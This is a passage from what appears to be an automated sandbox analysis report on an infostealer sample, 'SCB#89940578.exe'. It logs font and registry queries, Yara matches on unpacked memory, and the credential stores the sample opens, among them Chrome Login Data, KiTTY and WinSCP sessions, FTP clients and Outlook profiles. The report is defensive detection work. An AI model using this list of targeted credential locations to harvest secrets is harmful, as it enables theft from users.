Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: PopPassword 2_2_0040D069
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: SmtpPassword 2_2_0040D069
Source: Yara match File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

barindex
Source: Yara match File source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs